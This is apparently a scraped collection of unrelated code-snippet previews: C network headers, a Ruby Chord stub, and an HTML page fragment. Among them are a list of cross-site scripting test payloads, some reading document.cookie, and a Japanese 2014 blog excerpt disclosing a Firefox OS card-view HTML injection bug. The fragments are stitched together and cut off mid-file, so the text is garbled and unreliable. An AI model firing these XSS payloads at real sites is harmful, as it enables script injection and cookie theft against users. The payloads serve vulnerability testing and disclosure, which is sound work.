全然理解出来てなかったので調べてみた。
function f () {
// Class
}
/* | |
* This program is free software: you can redistribute it and/or modify | |
* it under the terms of the GNU General Public License as published by | |
* the Free Software Foundation, either version 3 of the License, or | |
* (at your option) any later version. | |
*/ | |
#include <arpa/inet.h> | |
#include <linux/if_packet.h> | |
#include <stdio.h> |
/* | |
* This program is free software: you can redistribute it and/or modify | |
* it under the terms of the GNU General Public License as published by | |
* the Free Software Foundation, either version 3 of the License, or | |
* (at your option) any later version. | |
*/ | |
#include <arpa/inet.h> | |
#include <linux/if_packet.h> | |
#include <linux/ip.h> |
#!/usr/bin/env ruby | |
require 'eventmachine' | |
require 'securerandom' | |
require 'optparse' | |
require 'ostruct' | |
class Chord | |
BITS = 8 | |
end |
'';!--"<XSS>=&{()}``\"
<script>alert(XSS);</script>
"><script>alert(XSS);</script>
<ScrIpt>alert(1);</SCript>
<a onmouseover="alert(document.cookie)">XSS</a>
<a onmouseover=alert(document.cookie)>XSS</a>
<<script>alert("XSS");//<</script>
<iframe src="javascript:alert('XSS');"></iframe>
<iframe src=# onmouseover="alert(document.cookie)"></iframe>
「Firefox OS Advent Calendar 2014」と「脆弱性"&'<<>\ Advent Calendar 2014」の12月20日の記事です。
先月報告したFirefox OSのHTMLインジェクションバグ(Bug 1101158 )について紹介します。このバグはFirefox OS Simulatorを含む一部の環境ではまだ修正されていませんが、リスク評価の上、Mozillaよりちょうど本日(!!)、公開の許可を頂き掲載しております。
Firefox OS v2.1/v2.2には、端末のホームボタンを長押ししたときに表示されるカードビューに、HTMLインジェクションの可能な箇所がありました。カードビューとはアクティブなウィンドウの一覧を表示する機能なのですが、ウィンドウのタイトルにHTMLタグが含まれることが考慮されていませんでした。
<!DOCTYPE html> | |
<html lang="ja"> | |
<head> | |
<meta charset="utf-8"> | |
<title>We broke up</title> | |
<link href='http://fonts.googleapis.com/css?family=Cookie' rel='stylesheet' type='text/css'> | |
<style type="text/css"> | |
div#question { | |
font-size:4em; | |
font-family: 'Cookie', cursive; |